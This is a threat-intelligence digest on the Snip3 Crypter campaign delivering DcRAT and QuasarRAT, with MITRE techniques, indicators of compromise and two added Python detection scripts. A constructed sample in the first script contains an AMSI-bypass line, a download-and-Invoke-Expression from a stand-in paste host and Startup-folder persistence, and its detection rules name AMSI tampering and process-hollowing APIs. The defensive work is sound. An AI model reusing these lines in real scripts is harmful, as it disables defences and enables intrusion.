ThreatLabz analyzes the Snip3 Crypter, a multi-stage RAT loader offered as a crypter-as-a-service, which deploys new TTPs to deliver DcRAT and QuasarRAT across multiple industries via spear-phishing. The campaigns repeatedly evolve techniques to evade detection, including in-memory loading, AMSI bypass, and frequent infrastructure changes. #Snip3Crypter #DcRAT #QuasarRAT #SpearPhishing #TaxStatements #ThreatLabz
Key Points
- Threat actors use spear phishing emails with subjects related to “tax statements” to lure victims into the multi-stage infection chain.
- The top targeted industries include Healthcare, Energy, and Manufacturing.
- Snip3 Crypter delivers remote access trojans like DcRAT and QuasarRAT using new TTPs in its infection chain.
- New techniques in the infection chain include fetching malicious strings from database servers, AMSI bypass by forcing an error, in-memory decryption with hardcoded keys, and stage-by-stage PowerShell delivery.
- The final RAT payloads are delivered via RunPE-based process hollowing (Stage-4) after dynamic code compilation.
- Threat actors frequently shift infrastructure and route downloads through a URL shortener (TinyURL) to evade domain-based detections.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The attack is initiated through a spear phishing email with a tax-statement lure in the subject line – “The attack is initiated through a spear phishing email that has the subject line ‘Download your tax statement’ or, in French, ‘Télécharger votre relevé fiscal’.”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – The Stage-1 VBScript opens an ADODB connection to a remote database and reads the next-stage strings from it – “Stage-1 VBScript … establishes a connection to a database by creating an ADODB connection and record object.”
- [T1047] Windows Management Instrumentation – The malware fingerprints the host by querying the machine UUID through WMI – “HWID() function executes a WMI Object query (‘get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID’).”
- [T1082] System Information Discovery – Stage-3 collects OS name/Version/Architecture and user details to tailor the payload – “the operating system’s name, version, and architecture (32-bit or 64-bit) are collected …”
- [T1055.012] Process Hollowing – RunPE-based loader is used to inject the final RAT into a remote process – “The loader … RunPE source code … to perform Process Hollowing to execute the RAT.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – AMSI is bypassed by setting AmsiContext to 0, so every subsequent scan call fails with E_INVALIDARG and the script content is never inspected – “AMSI bypass was discovered … by setting the AmsiContext to ‘0,’ which causes AmsiScanBuffer/AmsiScanString to return E_INVALIDARG.”
- [T1059.001] PowerShell – Stage-2/Stage-3 PowerShell usage and execution flow including downloads and in-memory execution – “Powershell.exe -ExecutionPolicy RemoteSigned -Command ‘Decoded PowerShell Script’.” and “Invoke-Expression” usage to run Stage-3/Stage-4 scripts.
- [T1105] Ingress Tool Transfer – Stage-3/Stage-4 PS scripts are downloaded from a remote download server over HTTP – “The Stage-3 PowerShell Script downloads the Stage-4 Powershell script from the Download Server.”
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence is achieved by writing a VBScript to the Startup folder so it runs on every system startup – “On every system startup, the ‘GoogleChromeUpdateHandlerx64.vbs’ script is executed from the startup folder.”
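Most of the chain summarized in the Key Points and in the MITRE list above is visible as script text: the Stage-1 VBScript attachment, the PowerShell stages captured by script-block logging (PowerShell Operational event 4104), and the file dropped into the Startup folder. The following is an added example written for this digest, not code from ThreatLabz or the Zscaler post; it scores a script body against those behaviours and treats two or more of them in one script as worth an analyst's attention. The regexes, the AmsiUtils class name, the Add-Type pattern assumed for “dynamic code compilation”, and the process-hollowing API names are assumptions, and the three sample scripts are constructed, not captured stages.

```python
"""Triage script text against the Snip3 Crypter chain TTPs described above.

Added example for this digest, not code from ThreatLabz or the Zscaler post.
The regexes, the AmsiUtils class name, the Add-Type pattern and the RunPE
API names are assumptions; the three sample scripts below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str   # ATT&CK ID from the digest, or a label for non-ATT&CK behaviour
    name: str
    patterns: tuple  # every pattern must match for the rule to fire


RULES = (
    Rule("T1059.005", "VBScript opens an ADODB connection/recordset (Stage-1 string fetch)",
         (re.compile(r"CreateObject\(\s*[\"']ADODB\.(Connection|Recordset)[\"']\s*\)", re.I),)),
    Rule("T1047", "WMI query for the machine UUID (HWID fingerprint)",
         (re.compile(r"Get-WmiObject\s+Win32_ComputerSystemProduct", re.I),
          re.compile(r"\bUUID\b"))),
    Rule("T1562.001", "AMSI tampering via amsiContext (AmsiUtils class name is an assumption)",
         (re.compile(r"AmsiUtils|amsiContext|AmsiScanBuffer|AmsiScanString", re.I),)),
    Rule("T1059.001", "Invoke-Expression of content downloaded in memory",
         (re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
          re.compile(r"DownloadString|Invoke-WebRequest|Net\.WebClient", re.I))),
    Rule("T1105", "Download from a raw paste/hastebin-style URL",
         (re.compile(r"https?://[^\s\"']+/raw/[A-Za-z0-9]+", re.I),)),
    Rule("T1547.001", "Script dropped into the Startup folder",
         (re.compile(r"Startup\\[^\"'\s]+\.vbs|GoogleChromeUpdateHandlerx64\.vbs", re.I),)),
    Rule("T1055.012", "RunPE-style process hollowing (API names are assumptions)",
         (re.compile(r"\bRunPE\b|NtUnmapViewOfSection|SetThreadContext|ResumeThread", re.I),)),
    Rule("dynamic-compilation", "In-memory compilation via Add-Type (assumption)",
         (re.compile(r"Add-Type\s+-TypeDefinition", re.I),)),
)


def techniques(script: str) -> set:
    """IDs of every rule whose patterns all match the script text."""
    return {r.technique for r in RULES if all(p.search(script) for p in r.patterns)}


def matches(script: str) -> list:
    """(technique, rule name) pairs in rule order, for the analyst's report."""
    hit = techniques(script)
    return [(r.technique, r.name) for r in RULES if r.technique in hit]


def suspicious(script: str, threshold: int = 2) -> bool:
    """Two or more distinct chain behaviours in one script is worth a look;
    a lone WMI UUID query or Invoke-WebRequest is routine in admin tooling."""
    return len(techniques(script)) >= threshold


# Constructed samples (not real captured stages): a Stage-1-like VBScript,
# a Stage-2/3-like PowerShell script block, and a benign admin script.
SAMPLE_VBS = r'''
Set cn = CreateObject("ADODB.Connection")
Set rs = CreateObject("ADODB.Recordset")
cn.Open "Provider=SQLOLEDB;Data Source=db.example.invalid;User ID=u;Password=p"
rs.Open "SELECT stage FROM t", cn
'''

SAMPLE_PS = r'''
$hwid = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
$t = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$t.GetField('amsiContext', 'NonPublic,Static').SetValue($null, 0)
$s = (New-Object Net.WebClient).DownloadString('https://paste.example.invalid/raw/abcd1234')
Invoke-Expression $s
Copy-Item stage.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChromeUpdateHandlerx64.vbs"
'''

SAMPLE_BENIGN = r'''
Get-WmiObject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
Invoke-WebRequest -Uri https://updates.example.invalid/agent.msi -OutFile agent.msi
'''

if __name__ == "__main__":
    for label, body in (("stage1.vbs", SAMPLE_VBS), ("stage2.ps1", SAMPLE_PS),
                        ("admin.ps1", SAMPLE_BENIGN)):
        print(f"{label}: suspicious={suspicious(body)} {matches(body)}")
```

The rules are deliberately behaviour-based rather than hash-based, since the post's own point is that the actors change infrastructure and re-crypt stages; only the Startup-folder filename is a campaign-specific string, and it is kept as an alternation so the rule still fires on a renamed dropper.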
Indicators of Compromise (IoCs)
- [Hash] Stage-1 VBScript – bd23ae38590d87243af890505d6fbeec, a41de1ef870e970e265cc35b766a5ec8
- [Domain] Database servers queried by Stage-1 for malicious strings – SQL8001.site4now.net, SQL8003.site4now.net, SQL8004.site4now.net
- [URL] Stage-2/Stage-3 download URLs – pastetext.net/raw/lcscgt0mss, toptal.com/developers/hastebin/raw/buliforayu
- [Hash] Stage-2 PowerShell – a5b76ca780ddff061db6f86f03d3b120
- [Hash] Stage-3 PowerShell – b78c9bb6070340bb4d352c712a0a28b7
- [IP] Final-stage download servers – 185.81.157.59, 185.81.157.172, 185.81.157.136, 185.81.157.117
- [Hash] DcRAT Loader – 923f46f8a9adfd7a48536de6f851d0f7
- [Hash] QuasarRAT Loader – dda2ba195c9ebc9f169770290cd9f68a
- [Hash] Final DcRAT payload – ef2236c85f915cae6380c64cc0b3472a
- [Hash] Final QuasarRAT payload – 0bbc89719ff3c4a90331288482c95eac
- [Domain] DcRAT C2 – crazydns.linkpc.net:5900
- [IP] QuasarRAT C2 – 185.81.157.203:1111
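Hunting the IoCs above across proxy, DNS, firewall and EDR logs is the usual next step. The following is an added example for this digest, not a ThreatLabz tool: it loads the listed hashes, hostnames, URLs and IPs and matches them against constructed sample log lines. Full hostnames are matched rather than parent zones (site4now.net and linkpc.net are shared-hosting and dynamic-DNS parents that serve far more than this campaign), the paste URLs are matched on the full raw path rather than the paste site's host, and the QuasarRAT C2 address is only an exact hit when the listed port 1111 is present. The log lines and their timestamps are constructed.

```python
"""Hunt the IoCs listed in this digest across log lines.

Added example, not code from ThreatLabz or the Zscaler post. The IoC values
are the ones listed above; the log lines below are constructed samples.
"""
import re

HASHES = {  # 32-hex (MD5) values from the IoC list, stored lowercase
    "bd23ae38590d87243af890505d6fbeec", "a41de1ef870e970e265cc35b766a5ec8",  # Stage-1 VBScript
    "a5b76ca780ddff061db6f86f03d3b120",  # Stage-2 PowerShell
    "b78c9bb6070340bb4d352c712a0a28b7",  # Stage-3 PowerShell
    "923f46f8a9adfd7a48536de6f851d0f7",  # DcRAT loader
    "dda2ba195c9ebc9f169770290cd9f68a",  # QuasarRAT loader
    "ef2236c85f915cae6380c64cc0b3472a",  # DcRAT payload
    "0bbc89719ff3c4a90331288482c95eac",  # QuasarRAT payload
}
DOMAINS = {  # full hostnames only; parent zones are shared hosting / dynamic DNS
    "sql8001.site4now.net", "sql8003.site4now.net", "sql8004.site4now.net",
    "crazydns.linkpc.net",  # DcRAT C2 (port 5900)
}
URLS = {  # scheme stripped, host lowercased, path kept as-is
    "pastetext.net/raw/lcscgt0mss",
    "toptal.com/developers/hastebin/raw/buliforayu",
}
IPS = {  # address -> listed port, or None when any port is of interest
    "185.81.157.59": None, "185.81.157.172": None,
    "185.81.157.136": None, "185.81.157.117": None,  # final-stage download servers
    "185.81.157.203": 1111,  # QuasarRAT C2
}

MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")


def normalise_url(url: str) -> str:
    """Drop the scheme and a leading www., lowercase the host, keep the path."""
    rest = re.sub(r"^https?://", "", url, flags=re.I)
    host, sep, path = rest.partition("/")
    host = host.lower()
    if host.startswith("www."):
        host = host[4:]
    return host + sep + path


def match_line(line: str) -> list:
    """Every IoC hit in one log line; 'exact' is False when an address with a
    listed port is seen without that port (e.g. in DNS, or on another port)."""
    hits = []
    for h in MD5_RE.findall(line):
        if h.lower() in HASHES:
            hits.append({"kind": "hash", "value": h.lower(), "exact": True})
    for u in URL_RE.findall(line):
        n = normalise_url(u)
        if n in URLS:
            hits.append({"kind": "url", "value": n, "exact": True})
    for host in HOST_RE.findall(line):
        if host.lower() in DOMAINS:
            hits.append({"kind": "domain", "value": host.lower(), "exact": True})
    for tok in IPV4_RE.findall(line):
        addr, _, port = tok.partition(":")
        if addr in IPS:
            want = IPS[addr]
            exact = want is None or (port != "" and int(port) == want)
            hits.append({"kind": "ip", "value": tok, "exact": exact})
    return hits


def hunt(lines) -> list:
    """Run match_line over a sequence of lines, tagging each hit with its index."""
    return [{"line": i, **h} for i, line in enumerate(lines) for h in match_line(line)]


# Constructed sample log lines (proxy, DNS, EDR, firewall); not real telemetry.
SAMPLE_LOGS = [
    "2024-01-01T10:14:03Z proxy user=jdoe GET https://pastetext.net/raw/lcscgt0mss status=200",
    "2024-01-01T10:14:09Z dns query=SQL8003.site4now.net type=A",
    "2024-01-01T10:14:20Z proxy user=jdoe GET http://185.81.157.59/stage4 status=200",
    "2024-01-01T10:15:01Z edr process=powershell.exe md5=B78C9BB6070340BB4D352C712A0A28B7 args=-ExecutionPolicy RemoteSigned",
    "2024-01-01T10:16:30Z fw dst=185.81.157.203:1111 proto=tcp action=allow",
    "2024-01-01T10:16:31Z fw dst=185.81.157.203:443 proto=tcp action=allow",
    "2024-01-01T10:17:00Z dns query=crazydns.linkpc.net type=A",
    "2024-01-01T11:00:00Z proxy user=asmith GET https://www.toptal.com/developers/blog status=200",
    "2024-01-01T11:01:00Z dns query=login.microsoftonline.com type=A",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['kind']} {hit['value']} exact={hit['exact']}")
```

Because the post reports frequent infrastructure changes, treat the IP and URL hits as short-lived and the behavioural signals (the ADODB fetch, the AMSI tampering, the Startup-folder VBScript) as the durable part of the detection; the second toptal.com line above shows why matching the paste site's bare hostname would flood the result with unrelated traffic.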
Read more: https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time